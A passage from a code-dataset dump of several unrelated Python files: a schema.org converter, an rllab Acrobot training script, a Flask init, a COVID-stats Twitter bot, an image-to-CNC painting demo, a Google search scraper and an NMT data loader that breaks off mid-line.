self.json_schema[schema_id].get(\"fields\")\n\t\t\t\tself.add_fields(schema_id, sfields, fields)\n\n\t\telif stype == \"rdf:Property\":\n\t\t\tfields = self.get_fields(schema_dict, schema_dict)\n\t\t\tdomains = schema_dict.get(\"schema:domainIncludes\")\n\t\t\tif domains:\t\t\t\t\n\t\t\t\tif type(domains) == type([]):\n\t\t\t\t\tfor domain in domains:\n\t\t\t\t\t\tschema_id = domain[\"@id\"].replace(\"schema:\", \"\")\n\t\t\t\t\t\tself.set_schema(schema_id)\n\t\t\t\t\t\tsfields = self.json_schema[schema_id].get(\"fields\")\n\t\t\t\t\t\tself.add_fields(schema_id, sfields, fields)\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tschema_id = domains[\"@id\"].replace(\"schema:\", \"\")\n\t\t\t\t\tself.set_schema(schema_id)\n\t\t\t\t\tsfields = self.json_schema[schema_id].get(\"fields\")\n\t\t\t\t\tself.add_fields(schema_id, sfields, fields)\n\t\t\t\t\n\t\telif stype.startswith(\"schema:\"):\n\t\t\tschema_id = stype.replace(\"schema:\", \"\")\n\t\t\tself.set_schema(schema_id)\n\t\t\tif schema_dict[\"@id\"].startswith(\"schema\"):\n\t\t\t\tself.add_enum(schema_id, schema_dict[\"@id\"].replace(\"schema:\", \"\"))\n\t\telse:\n\t\t\traise Exception(\"Type not found: \" + stype)\n\n\tdef generate_schema_json(self, schema_dict):\n\t\tstypes = schema_dict[\"@type\"]\n\t\tif type(stypes) == type([]):\n\t\t\tfor stype in stypes:\n\t\t\t\tself.generate_from_type(schema_dict, stype)\n\t\telse:\n\t\t\tself.generate_from_type(schema_dict, stypes)\n\n\tdef main(self):\n\t\tfor schema_dict in self.schema_rdfs_json[\"@graph\"]:\n\t\t\tself.generate_schema_json(schema_dict)\n\n\t\tprint(json.dumps(self.json_schema))\n\t\t# for i in self.json_schema:\n\t\t# \tif i == \"FinancialService\":\n\t\t# \t\tprint(i, \" : \")\n\t\t# \t\tprint(pprint.pformat(self.json_schema[i]))\n\t\t# \t\tprop_list = []\n\t\t# \t\tfor j in self.json_schema[i][\"fields\"]:\n\t\t# \t\t\tprop_list.append(j[\"name\"])\n\t\t# \t\tprop_list.sort()\n\t\t# \t\tprint(prop_list)\n\t\t# \t\tprint(len(self.json_schema[i][\"fields\"]))\n\t\t# for i in self.json_schema:\n\t\t# \tfor j in self.json_schema[i][\"fields\"]:\n\t\t# \t\tif \"types\" not in j.keys():\n\t\t# \t\t\tprint(j)\n\t\t# print(len(self.json_schema))\n\nif __name__ == \"__main__\":\n\tschema_rdfs_json_file = \"schema.org-docs-schema_org_rdfa.json\"\n\tstjObj = SchemaOrgToJsonSchema(args=[], kwargs={\"schema_rdfs_json_file\" : schema_rdfs_json_file})\n\tstjObj.main()","sub_path":"varundeboss/apis/schema_org/scripts/schemaorg_rdfs_json_to_jsonschema.py","file_name":"schemaorg_rdfs_json_to_jsonschema.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"650613823","text":"from rllab.envs.gym_env import GymEnv\nfrom rllab.envs.box2d.cartpole_env import CartpoleEnv\n\nfrom rllab.algos.vpg import VPG\nfrom rllab.envs.normalized_env import normalize\nfrom rllab.misc.instrument import run_experiment_lite\nfrom rllab.policies.categorical_mlp_policy import CategoricalMLPPolicy\nfrom rllab.baselines.zero_baseline import ZeroBaseline\n# from rllab.optimizers.first_order_optimizer import FirstOrderOptimizer #sgd\nimport lasagne.updates\n\n\ndef run_task(*_):\n # env = normalize(HalfCheetahEnv())\n\n env = normalize(GymEnv(env_name = \"Acrobot-v1\",force_reset=True, record_video=True))\n\n max_path_length = env.horizon\n print(max_path_length)\n baseline = ZeroBaseline(env_spec=env.spec)\n policy = CategoricalMLPPolicy(\n env_spec=env.spec,\n # The neural network policy should have two hidden layers\n hidden_sizes=(64, 64)\n )\n # optimizer = FirstOrderOptimizer(update_method=lasagne.updates.adam, learning_rate=1e-1)\n\n algo = VPG(\n env=env,\n policy=policy,\n baseline=baseline,\n batch_size=800,\n max_path_length=500,\n n_itr=10000,\n discount=0.99,\n optimizer_args=dict(\n learning_rate=0.01,\n )\n )\n algo.train()\n\n # algo = VPG(\n # env=env,\n # policy=policy,\n # baseline=baseline,\n # optimizer=optimizer,\n # n_itr = 100,\n # batch_size = 100,\n # max_path_length = 100,\n # discount = 0.9,\n # )\n # algo.train()\n\nrun_experiment_lite(\n run_task,\n # Number of parallel workers for sampling\n log_dir='./log/vpg_acrobot_REINFORCE',\n n_parallel=1,\n # Only keep the snapshot parameters for the last iteration\n snapshot_mode=\"last\",\n # Specifies the seed for the experiment. If this is not provided, a random seed\n # will be used\n seed=1,\n # plot=True,\n)\n\n\n# https://github.com/rll/rllab/issues/146\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"rllab/vpg_gym_acrobot_REINFORCE.py","file_name":"vpg_gym_acrobot_REINFORCE.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55102366","text":"from os import environ\n\nfrom flask import Flask\n\nif environ['APP_SETTINGS'] is None:\n print(\"$APP_SETTINGS is not defined. Ensure it is set to config.ProductionConfig, config.StagingConfig, \"\n \"config.DevelopmentConfig, or config.TestingConfig\")\n\napp = Flask(__name__)\napp.config.from_object(environ['APP_SETTINGS'])\n\nfrom tixte_foss import routes # nopep8\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=environ['PORT'])\n","sub_path":"tixte_foss/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"39058453","text":"import os\nimport tweepy\nimport requests\nimport datetime \nimport os\nfrom pytz import timezone\nfrom bs4 import BeautifulSoup\nfrom threading import Timer\nfrom flask import Flask\n\napp = Flask(__name__)\n\n# keys de validação\nCONSUMER_KEY = os.environ.get('CONSUMER_KEY')\nCONSUMER_SECRET = os.environ.get('CONSUMER_SECRET')\nACCESS_KEY = os.environ.get('ACCESS_KEY')\nACCESS_SECRET = os.environ.get('ACCESS_SECRET')\n\n# Authenticate to Twitter\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_KEY, ACCESS_SECRET)\n\n# Create API object\napi = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n\n@app.route(\"/\")\n# tweet stats\ndef tweet1():\n #getting date\n now = datetime.datetime.now()\n fuso_horario = timezone('America/Sao_Paulo')\n nowtime = now.astimezone(fuso_horario)\n\n # getting data from brazil\n url = \"https://www.worldometers.info/coronavirus/country/brazil/\"\n r = requests.get(url)\n s = BeautifulSoup(r.text,\"html.parser\")\n data = s.find_all(\"div\",class_ = \"maincounter-number\")\n\n # getting data from world\n url2 = \"https://www.worldometers.info/coronavirus/\"\n r2 = requests.get(url2)\n s2 = BeautifulSoup(r2.text,\"html.parser\")\n data2 = s2.find_all(\"div\",class_ = \"maincounter-number\")\n\n api.update_status(\"--\" + nowtime.strftime(\"%Y-%m-%d %H:%M:%S\") + \"--\" + \"\\n\\nTotal Casos: 🇧🇷 \"+ data[0].text.strip() + \" // 🌎 \" + data2[0].text.strip() + \"\\nTotal Mortes: 🇧🇷 \" + data[1].text.strip() + \" // 🌎 \" + data2[1].text.strip() + \"\\nTotal Recuperados: 🇧🇷 \" + data[2].text.strip()+ \" // 🌎 \" + data2[2].text.strip())\n\n print(\"tweetado1\" + nowtime.strftime(\"%Y-%m-%d %H:%M\"))\n\n Timer(300.0, tweet2).start()\n\ndef tweet2():\n #getting date\n now = datetime.datetime.now()\n fuso_horario = timezone('America/Sao_Paulo')\n nowtime = now.astimezone(fuso_horario)\n\n #getting data\n url = \"https://www.worldometers.info/coronavirus/country/brazil/\"\n r = requests.get(url)\n s = BeautifulSoup(r.text,\"html.parser\")\n data_name = s.find_all(\"div\",class_ = \"number-table-main\")\n data_name2 = s.find_all(\"span\",class_ = \"number-table\")\n\n api.update_status(\"--\" + nowtime.strftime(\"%Y-%m-%d %H:%M:%S\") + \"--\" + \"\\n\\nCasos ativos 🇧🇷\\nAtualmente infectados: \" + data_name[0].text.strip() + \"\\nEm condições suaves: \" + data_name2[0].text.strip() + \" (\" + data_name2[0].next_sibling.next_sibling.text.strip() + \"%)\\nSério ou Crítico: \" + data_name2[1].text.strip() + \" (\" + data_name2[1].next_sibling.next_sibling.text.strip() + \"%)\\n\\nCasos fechados 🇧🇷\\nCasos que tiveram um resultado: \" + data_name[1].text.strip() + \"\\nRecuperados: \" + data_name2[2].text.strip() + \" (\" + data_name2[2].next_sibling.next_sibling.text.strip() + \"%)\\nMortos: \" + data_name2[3].text.strip() + \" (\" + data_name2[3].next_sibling.next_sibling.text.strip() + \"%)\")\n\n print(\"tweetado2\" + nowtime.strftime(\"%Y-%m-%d %H:%M\"))\n\n Timer(10800.0, tweet1).start()\n\ndef tweet():\n tweet1()\n\nTimer(10800.0, tweet).start()\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5002))\n app.run(host='0.0.0.0', port=port)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"382606792","text":"#-------------------------------------------------\r\n# Copyright (c) 2019, Titus Ebbecke. All rights reserved.\r\n#-------------------------------------------------\r\n\r\nimport numpy as np\r\nfrom numpy import linalg as LA\r\nimport cv2\r\nimport sys\r\nimport math\r\nimport socket\r\nimport time\r\nimport datetime\r\nimport pathlib\r\nimport config as cfg\r\nimport configcheck as check\r\nimport colors\r\nfrom copy import deepcopy\r\n\r\n#-------------------------------------------------\r\n# Initialize image loading/generation and check config\r\n\r\ncheck.imgLoad()\r\ncheck.securityCheck()\r\n\r\n#-------------------------------------------------\r\n# Image preparation and color quantization\r\n\r\nimg = cv2.imread(check.img)\r\n\r\nheight, width, depth = img.shape\r\nimg = cv2.resize(img,(int(width*cfg.imgScale), int(height*cfg.imgScale))) # Scales image, when defined in config.py\r\n\r\n# Apply fine tuning, when specified in config.py\r\nif cfg.blur > 0:\r\n img = cv2.GaussianBlur(img,(cfg.blur,cfg.blur),0)\r\nif cfg.denoise > 0:\r\n img = cv2.fastNlMeansDenoisingColored(img,None,cfg.denoise,cfg.denoise,7,21)\r\nif cfg.threshColor >= 0:\r\n img = cv2.threshold(img,cfg.threshColor,255,cv2.THRESH_BINARY)[1]\r\n\r\nY = img.reshape((-1, 3))\r\nY = np.float32(Y)\r\n\r\n# K-means Algorithm to reduce color amount to K\r\nK = colors.colorPaint.shape[0] # Amount of colors\r\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\r\nret,label,center=cv2.kmeans(Y,K,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)\r\ncenter = np.uint8(center)\r\nres = center[label.flatten()]\r\nres2 = res.reshape((img.shape))\r\n\r\n#-------------------------------------------------\r\n# Change reduced colors to the colors defined in colors.py\r\n\r\ncolorDifferenceMax = 500\r\na = []\r\nb = []\r\nc = []\r\n\r\nfor i in range(K):\r\n for j in range(K):\r\n #d = math.sqrt((((center[i][2])-(colors.colorPaint[j][2])))**2 + (((center[i][1])-(colors.colorPaint[j][1])))**2 + (((center[i][0])-(colors.colorPaint[j][0])))**2) # Calculate euclidean distance between source colors and palette colors\r\n d = math.sqrt((((center[i][2])-(colors.colorPaint[j][2]))*0.3)**2 + (((center[i][1])-(colors.colorPaint[j][1]))*0.59)**2 + (((center[i][0])-(colors.colorPaint[j][0]))*0.11)**2) # Calculate euclidean distance with weights. May improve color matching. Eyes perceive some colors better then others. Uncomment this line and comment out the above one, to apply\r\n a.insert(j, int(d))\r\n if a[np.argmin(a)] < colorDifferenceMax: # Fallback when color distance is too large\r\n b.insert(i, np.argmin(a))\r\n a.clear()\r\n c.clear()\r\n else:\r\n b.insert(i, \"null\")\r\n a.clear()\r\n\r\n# Match colors from k-means reduced input image with color palette from colors.py\r\nfor i in range(K):\r\n res2[np.where((res2== [center[i]]).all(axis=2))] = [colors.colorPaint[b][i]]\r\nimgReduced = deepcopy(res2)\r\n\r\n#-------------------------------------------------\r\n# Setup parameters for CNC translation\r\n\r\n# Calculate pixel-to-mm ratio\r\ncanvasSize = [cfg.canvasWidth, cfg.canvasHeight]\r\nif img.shape[0] > img.shape[1]:\r\n resizeFactor = canvasSize[0]/img.shape[0]\r\nelse:\r\n resizeFactor = canvasSize[0]/img.shape[1]\r\n\r\n# Setup variables\r\nsize = np.size(img)\r\ndone = False\r\nbrushPixel = (cfg.brushSize/resizeFactor)*2\r\ntolerance = 5 # Shrinks the brush size to force overlapping strokes. Increase for less missed spots. Value in mm.\r\ninitialPath = True\r\ncontourExists = False\r\nsinglePathJump = False\r\ndirectionDegrees = 90\r\nkernelBrush = np.ones((int(brushPixel)-int((tolerance/resizeFactor)*2),int(brushPixel)-int((tolerance/resizeFactor)*2)),np.uint8) # Erosion kernel. Reduces brush size. Increase negative values, to reduce missed painting spots\r\nmessageCount = 0\r\n\r\n#-------------------------------------------------\r\n# Communication disabled in demo mode\r\n#\r\n# Network - Socket\r\n\r\n#Binds the Client with the Server\r\n#mySocket = socket.socket()\r\n#mySocket.bind((cfg.host,cfg.port))\r\n \r\n#mySocket.listen(1)\r\n#conn, addr = mySocket.accept()\r\n#print (\"Connection from: \" + str(addr))\r\n\r\n#-------------------------------------------------\r\n# Define communication function\r\n\r\ndef sendActions(message):\r\n global messageCount\r\n #message = message.encode()\r\n #conn.send(message)\r\n print(\"Message sent to client:\", message)\r\n print(\"\\n\")\r\n messageCount += 1\r\n #answer = conn.recv(33)\r\n #answer = answer.decode()\r\n #print(\"Client answer:\", answer)\r\n\r\n#-------------------------------------------------\r\n# Near-Real-Time communication with robot\r\n#\r\n# DOCUMENTATION\r\n#\r\n# <Status 1> = Normal frame of coordinates.\r\n# <Status 2> = Take paint with tool. May be removed, when your tool supports continous paint delivery and needs no paint refresh.\r\n# <Status 3> = Path jump. A contour has been finished and the robot jumps to the beginning of the next contour.\r\n\r\n# Loop through all colors K\r\nfor i in range(K):\r\n mask = cv2.inRange(res2, colors.colorPaint[i], colors.colorPaint[i]) # Define parameters of the color mask\r\n ## Remove noise form mask with erosion followed by dilation (Opening)\r\n #kernel = np.ones((2,2),np.uint8) # Fine tune kernel for less or more denoising\r\n #mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\r\n colorSelected = colors.colorPaint[i]\r\n\r\n while(not done):\r\n ret, thresh = cv2.threshold(mask, 127, 255, 0) # Mask color K\r\n im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) # Find contours in color mask\r\n cv2.drawContours(res2, contours, -1, (0,255,0), 1) # Draw contours\r\n zeros = size - cv2.countNonZero(mask)\r\n mask = cv2.erode(mask,kernelBrush,iterations = 1) # Shrink mask for innermore contour\r\n\r\n # Take paint for the very first time, when currently selected color exists\r\n if len(contours) > 0 and initialPath == True:\r\n sendActions('<Ext><Status>2</Status><Color>99</Color></Ext>')\r\n print(\"Start with color:\", colors.colorPaint[i])\r\n currentStrokeLength = 0\r\n initialPath = False\r\n\r\n # Loop through all contours of the current color\r\n for l in range(len(contours)):\r\n newPath = False\r\n if len(contours[l])>1:\r\n for m in range(len(contours[l])):\r\n contourExists = True\r\n # Calculate distance to next coordinate, if there is a next coordinate in the array\r\n if m < (len(contours[l])-1):\r\n dist = round((np.linalg.norm(contours[l][m][0]-contours[l][m+1][0]))*resizeFactor,1) # Calculate euclidean distance from current to next point\r\n \r\n # Calculate more distant coordinates\r\n if m < (len(contours[l])-5):\r\n longDist = round((np.linalg.norm(contours[l][m][0]-contours[l][m+5][0]))*resizeFactor,1) # Calculate euclidean distance from current to fifth next point\r\n longX = round(contours[l][m+5][0][0]*resizeFactor)\r\n longY = round(contours[l][m+5][0][1]*resizeFactor)\r\n # Fallback, when the coordinate array approached it's end\r\n else: \r\n longX = round(contours[l][m][0][0]*resizeFactor)\r\n longY = round(contours[l][m][0][1]*resizeFactor)\r\n longDist = 0\r\n\r\n # Calculate final coordinates (new and old ones)\r\n # A coordinate is one xy-point in pixel of the contour-array\r\n # It's then multiplied by the resize factor, to convert it into mm\r\n currentX = round((contours[l][m][0][0])*resizeFactor)\r\n currentY = round((contours[l][m][0][1])*resizeFactor)\r\n lastX = round((contours[l][m-1][0][0])*resizeFactor)\r\n lastY = round((contours[l][m-1][0][1])*resizeFactor)\r\n\r\n # Calculate the direction to the next point\r\n directionRadians = math.atan2(currentY-lastY, currentX-lastX)\r\n directionDegrees = (round(math.degrees(directionRadians)/10))*10\r\n # If the distance to the next point is too short and therefore irrelevant, take fifth next point\r\n # This prevents the tool from changing it's direction unnecessarily much, when points have wildly different directions, because they're very close to each other\r\n if longDist < 40:\r\n directionRadians = math.atan2(longY-lastY, longX-lastX)\r\n directionDegrees = (round(math.degrees(directionRadians)/10))*10\r\n\r\n # CLI info\r\n print(\"Angle to next point:\", directionDegrees)\r\n print(\"Distance to next point:\", dist)\r\n print(\"Stroke length:\", currentStrokeLength)\r\n \r\n #-------------------------------------------------\r\n # Sending status and coordinate frames\r\n \r\n # Check if coordinates are far enough away from the canvas border\r\n # Not painting these coordinates prevents the robot from painting 'framing contours'\r\n # These are created when the edge-contour of a (empty) background are found\r\n # You may change this, if you also want these to be painted, e.g. in a full color painting\r\n if currentX <= canvasSize[0]-10 and currentY <= canvasSize[1]-10 and currentX > 10 and currentY > 10: \r\n sendActions('<Ext><Status>1</Status><Points><xyzabc X=\"'+str(currentX)+'\" Y=\"'+str(currentY)+'\" Z=\"'+str(cfg.toolDepth)+'\" A=\"-0\" B=\"-15\" C=\"0\"/></Points></Ext>')\r\n \r\n # When coordinates are too close to the edge (framing coordinates), move the robot to X=350, Y=350, Z=-300\r\n # The robot will stay there and do nothing, until the current coordinates are not framing coordinates\r\n elif currentX <= canvasSize[0] and currentY <= canvasSize[1]:\r\n print(\"Coordinates too close to the edge. Wait for innermore coordinates.\")\r\n sendActions('<Ext><Status>1</Status><Points><xyzabc X=\"350\" Y=\"350\" Z=\"-300\" A=\"-0\" B=\"-15\" C=\"0\"/></Points></Ext>')\r\n \r\n else:\r\n # Exit with fatal, when coordinates outside of the canvas are being generated\r\n # This prevents the robot from leaving the canvas during the painting process\r\n print(\"currentX, currentY\", currentX, currentY)\r\n sys.exit(\"Fatal: Points are being generated, that are larger than the given canvas size. Proceeding may cause serious damage and injury to the manipulator and it's sourroundings.\")\r\n \r\n # Refresh paint, if the robot has painted a path longer than \"strokeLength\"\r\n if currentStrokeLength > cfg.strokeLength:\r\n print(\"Maximum stroke length reached. Refresh paint\")\r\n sendActions('<Ext><Status>2</Status><Color>99</Color></Ext>') \r\n currentStrokeLength = 0 # Reset length of the stroke after color refresh\r\n\r\n currentStrokeLength = currentStrokeLength+dist # Calculate the length of the path painted\r\n singlePathJump = True\r\n\r\n print(\"Contour finished. Jump to new contour.\")\r\n if singlePathJump == True:\r\n # Jump to new contour\r\n sendActions('<Ext><Status>3</Status><Points><xyzabc X=\"'+str(lastX)+'\" Y=\"'+str(lastY)+'\" Z=\"'+str(cfg.toolDepth)+'\" A=\"-0\" B=\"-15\" C=\"0\"/></Points></Ext>')\r\n newPath = True\r\n singlePathJump = False\r\n \r\n if zeros==size:\r\n done = True\r\n contourExists == False\r\n done = False\r\n\r\nif done == True:\r\n #conn.close()\r\n print(\"Color finished.\")\r\n\r\n#-------------------------------------------------\r\n# Save and show prepared source image and paths.\r\n\r\npathlib.Path(\"demo_results\").mkdir(exist_ok=True) # Create /demo_results folder, if it doesn't exist\r\nfilename = \"demo_results/\"+str(f\"{datetime.datetime.now():%Y%m%d_%H-%M-%S}\") # Randomize filename\r\ncv2.imwrite(filename+\"_source.png\", img) # Save image\r\ncv2.imwrite(filename+\"_reduced.png\", imgReduced) # Save image\r\ncv2.imwrite(filename +\"_vectors.png\", res2) # Save image\r\nprint(\"Painting finished.\")\r\nprint(\"Total amount of messages sent:\", messageCount)\r\nprint(\"Results saved as: \"+filename)\r\ncv2.imshow(\"Path Preview\", res2)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","sub_path":"DEMO_imgToCNC.py","file_name":"DEMO_imgToCNC.py","file_ext":"py","file_size_in_byte":12875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"263505116","text":"#!/usr/bin/env python2\n#\n# Perform a google search using python.\nimport urllib\nimport mechanize\nfrom bs4 import BeautifulSoup as BS\nimport re\n\n#function that takes the input word.\ndef getGoogleLinks(link):\n # create a browser and change user agent so it thinks we're a person, not a machine.\n br = mechanize.Browser()\n br.set_handle_robots(False)\n br.addheaders = [('User-agent','chrome')]\n\n # replace any spaces in the search term with +.\n term = link.replace(\" \",\"+\")\n # append the search term to the url.\n query = \"https://www.google.com/search?q=\"+term\n htmltext = br.open(query).read()\n soup = BS(htmltext)\n search = soup.findAll('div',attrs={'id':'search'})\n searchtext = str(search[0])\n soup1 = BS(searchtext)\n list_items = soup1.findAll('li')\n regex = \"q(?!.*q).*?&\"\n pattern = re.compile(regex)\n\n results_array = []\n\n for li in list_items:\n soup2 = BS(str(li))\n links = soup2.findAll('a')\n source_link = links[0]\n source_url = re.findall(pattern,str(source_link))\n if len(source_url)>0:\n results_array.append(str(source_url[0].replace(\"q=\",\"\").replace(\"&\",\"\")))\n return results_array\n\n","sub_path":"google/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"104130973","text":"from os.path import join\nimport numpy as np\nimport torch\nimport all_constants as ac\nimport utils as ut\n\nnp.random.seed(ac.SEED)\n\n\nclass DataManager(object):\n def __init__(self, args):\n super(DataManager, self).__init__()\n self.args = args\n self.pairs = args.pairs.split(',')\n self.lang_vocab, self.lang_ivocab = ut.init_vocab(join(args.data_dir, 'lang.vocab'))\n self.vocab, self.ivocab = ut.init_vocab(join(args.data_dir, 'vocab.joint'))\n self.logit_masks = {}\n for lang in self.lang_vocab:\n mask = np.load(join(args.data_dir, 'mask.{}.npy'.format(lang)))\n self.logit_masks[lang] = torch.from_numpy(mask)\n\n def load_data(self):\n self.data = {}\n data_dir = self.args.data_dir\n batch_size = self.args.batch_size\n for pair in self.pairs:\n self.data[pair] = {}\n src_lang, tgt_lang = pair.split('2')\n for mode in [ac.TRAIN, ac.DEV]:\n src_file = join(data_dir, '{}/{}.{}.npy'.format(pair, mode, src_lang))\n guess_file = join(data_dir, '{}/{}.guess.{}.npy'.format(pair, mode, tgt_lang))\n tgt_file = join(data_dir, '{}/{}.target.{}.npy'.format(pair, mode, tgt_lang))\n src = np.load(src_file)\n guess = np.load(guess_file)\n tgt = np.load(tgt_file)\n self.args.logger.info('Loading {}-{}'.format(pair, mode))\n self.data[pair][mode] = PEDataset(src, guess, tgt, batch_size)\n\n # batch sampling similar to in preprocessing.py\n ns = np.array([len(self.data[pair][ac.TRAIN]) for pair in self.pairs])\n ps = ns / sum(ns)\n ps = ps ** self.args.alpha\n ps = ps / sum(ps)\n self.ps = ps\n self.args.logger.info('Sampling batches with probs:')\n for idx, pair in enumerate(self.pairs):\n self.args.logger.info('{}, n={}, p={}'.format(pair, ns[idx], ps[idx]))\n\n self.train_iters = {}\n for pair in self.pairs:\n self.train_iters[pair] = self.data[pair][ac.TRAIN].get_iter(shuffle=True)\n\n # load dev translate batches\n self.translate_data = {}\n for pair in self.pairs:\n src_lang, tgt_lang = pair.split('2')\n src_file = join(data_dir, '{}/{}.{}.bpe'.format(pair, ac.DEV, src_lang))\n guess_file = join(data_dir, '{}/{}.guess.{}.bpe'.format(pair, ac.DEV, tgt_lang))\n ref_file = join(data_dir, '{}/{}.target.{}'.format(pair, ac.DEV, tgt_lang))\n self.args.logger.info('Loading dev translate batches')\n src_batches, guess_batches, sorted_idxs = self.get_translate_batches(src_file, guess_file, batch_size=batch_size)\n self.translate_data[pair] = {\n 'src_batches': src_batches,\n 'guess_batches': guess_batches,\n 'sorted_idxs': sorted_idxs,\n 'ref_file': ref_file\n }\n\n def get_batch(self):\n pair = np.random.choice(self.pairs, p=self.ps)\n try:\n src, guess, tgt, targets = next(self.train_iters[pair])\n except StopIteration:\n self.train_iters[pair] = self.data[pair][ac.TRAIN].get_iter(shuffle=True)\n src, guess, tgt, targets = next(self.train_iters[pair])\n\n src_lang, tgt_lang = pair.split('2')\n return {\n 'src': src,\n 'guess': guess,\n 'tgt': tgt,\n 'targets': targets,\n 'src_lang_idx': self.lang_vocab[src_lang],\n 'guess_lang_idx': self.lang_vocab[tgt_lang],\n 'tgt_lang_idx': self.lang_vocab[tgt_lang],\n 'pair': pair,\n 'logit_mask': self.logit_masks[tgt_lang]\n }\n\n def get_translate_batches(self, src_file, guess_file, batch_size=4096):\n sdata = []\n slens = []\n gdata = []\n glens = []\n with open(src_file, 'r') as fin:\n for line in fin:\n toks = line.strip().split()\n if toks:\n ids = [self.vocab.get(tok, ac.UNK_ID) for tok in toks] + [ac.EOS_ID]\n sdata.append(ids)\n slens.append(len(ids))\n\n with open(guess_file, 'r') as fin:\n for line in fin:\n gtoks = line.strip().split()\n if gtoks:\n ids = [self.vocab.get(tok, ac.UNK_ID) for tok in gtoks] + [ac.EOS_ID]\n gdata.append(ids)\n glens.append(len(ids))\n\n\n slens = np.array(slens)\n sdata = np.array(sdata)\n glens = np.array(glens)\n gdata = np.array(gdata)\n sorted_idxs = np.argsort(slens)\n slens = slens[sorted_idxs]\n sdata = sdata[sorted_idxs]\n glens = glens[sorted_idxs]\n gdata = gdata[sorted_idxs]\n\n # create batches\n src_batches = []\n guess_batches = []\n s_idx = 0\n length = sdata.shape[0]\n while s_idx < length:\n e_idx = s_idx + 1\n max_in_batch = slens[s_idx]\n gmax_in_batch = glens[s_idx]\n while e_idx < length:\n max_in_batch = max(max_in_batch, slens[e_idx])\n gmax_in_batch = max(gmax_in_batch, glens[e_idx])\n count = (e_idx - s_idx + 1) * 2 * max(max_in_batch, gmax_in_batch)\n if count > batch_size:\n break\n else:\n e_idx += 1\n\n max_in_batch = max(slens[s_idx:e_idx])\n gmax_in_batch = max(glens[s_idx:e_idx])\n src = np.zeros((e_idx - s_idx, max_in_batch), dtype=np.int32)\n guess = np.zeros((e_idx - s_idx, gmax_in_batch), dtype=np.int32)\n for i in range(s_idx, e_idx):\n src[i - s_idx] = list(sdata[i]) + (max_in_batch - slens[i]) * [ac.PAD_ID]\n guess[i - s_idx] = list(gdata[i]) + (gmax_in_batch - glens[i]) * [ac.PAD_ID]\n src_batches.append(torch.from_numpy(src).type(torch.long))\n guess_batches.append(torch.from_numpy(guess).type(torch.long))\n s_idx = e_idx\n\n return src_batches, guess_batches, sorted_idxs\n\n\nclass NMTDataset(object):\n def __init__(self, src, tgt, batch_size):\n super(NMTDataset, self).__init__()\n if src.shape[0] != tgt.shape[0]:\n raise ValueError('src and tgt must have the same size')\n\n self.batch_size = batch_size\n self.batches = []\n\n sorted_idxs = np.argsort([len(x) for x in src])\n src = src[sorted_idxs]\n tgt = tgt[sorted_idxs]\n src_lens = [len(x) for x in src]\n tgt_lens = [len(x) for x in tgt]\n\n # prepare batches\n s_idx = 0\n while s_idx < src.shape[0]:\n e_idx = s_idx + 1\n max_src_in_batch = src_lens[s_idx]\n max_tgt_in_batch = tgt_lens[s_idx]\n while e_idx < src.shape[0]:\n max_src_in_batch = max(max_src_in_batch, src_lens[e_idx])\n max_tgt_in_batch = max(max_tgt_in_batch, tgt_lens[e_idx])\n num_toks = (e_idx - s_idx + 1) * max(max_src_in_batch, max_tgt_in_batch)\n if num_toks > self.batch_size:\n break\n else:\n e_idx += 1\n\n batch = self.prepare_one_batch(\n src[s_idx:e_idx],\n tgt[s_idx:e_idx],\n src_lens[s_idx:e_idx],\n tgt_lens[s_idx:e_idx])\n self.batches.append(batch)\n s_idx = e_idx\n\n self.indices = list(range(len(self.batches)))\n\n def __len__(self):\n return len(self.batches)\n\n def prepare_one_batch(self, src, tgt, src_lens, tgt_lens):\n num_sents = len(src)\n max_src_len = max(src_lens)\n max_tgt_len = max(tgt_lens)\n\n src_batch = np.zeros([num_sents, max_src_len], dtype=np.int32)\n tgt_batch = np.zeros([num_sents, max_tgt_len], dtype=np.int32)\n target_batch = np.zeros([num_sents, max_tgt_len], dtype=np.int32)\n\n for i in range(num_sents):\n src_batch[i] = src[i] + (max_src_len - src_lens[i]) * [ac.PAD_ID]\n tgt_batch[i] = tgt[i] + (max_tgt_len - tgt_lens[i]) * [ac.PAD_ID]\n target_batch[i] = tgt[i][1:] + [ac.EOS_ID] + (max_tgt_len - tgt_lens[i]) * [ac.PAD_ID]\n\n src_batch = torch.from_numpy(src_batch).type(torch.long)\n tgt_batch = torch.from_numpy(tgt_batch).type(torch.long)\n target_batch = torch.from_numpy(target_batch).type(torch.long)\n return src_batch, tgt_batch, target_batch\n\n def get_iter(self, shuffle=False):\n if shuffle:\n np.random.shuffle(self.indices)\n\n for idx in self.indices:\n yield self.batches[idx]\n\n\nclass PEDataset(object):\n def __init__(self, src, guess, tgt, batch_size):\n super(PEDataset, self).__init__()\n if src.shape[0] != tgt.shape[0]:\n raise ValueError('src and tgt must have the same size')\n if src.shape[0] != guess.shape[0]:\n raise ValueError('src and guess must have the same size')\n if tgt.shape[0] != guess.shape[0]:\n raise ValueError('tgt and guess must have the same size')\n\n self.batch_size = 